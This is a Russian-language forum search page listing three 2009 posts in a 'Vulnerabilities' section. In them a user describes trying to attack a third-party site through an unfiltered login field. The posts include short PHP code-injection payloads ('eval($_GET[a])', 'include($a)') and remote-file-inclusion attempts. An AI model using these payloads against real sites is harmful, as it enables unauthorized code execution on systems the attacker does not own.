 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 3 из 3.
На поиск затрачено 0.00 сек. Поиск: Сообщения от: Mr.Hardwar |
Раздел: Уязвимости
09.07.2009, 09:58
|
|
Ответов: 18
Просмотров: 1,005
Автор
Mr.Hardwar
c http результат тот же( ...c http результат тот же( &a=http://mysite.ru/primer.php -выводится страница c Hacking attempt! &a=http://mysite.ru/primer.txt -страница грузится но ничо не инклудится..пишется "Привет, !" |
|
Раздел: Уязвимости
08.07.2009, 21:19
|
|
Ответов: 18
Просмотров: 1,005
Автор
Mr.Hardwar
<?eval($_GET[a])?> получается больше 16-ти...<?eval($_GET[a])?> получается больше 16-ти символов, а <?eval($a)?> и <?include($a)?> ничо не инклудят, ни локальные файлы ни с других хостов. (в адр строку добавляю &a=mysite.ru/file.txt) Это... |
|
Раздел: Уязвимости
06.07.2009, 10:10
|
|
Ответов: 18
Просмотров: 1,005
Автор
Mr.Hardwar
16 символов :(На одном ресе обнаружил такую штуку: когда входишь на сайт то на странице пишется "Привет ЛОГИН". так вот, при регистрации в поле логин никакой фильтрации нет и можно указывать любые символы. Облом... |
| Показано с 1 по 3 из 3. |
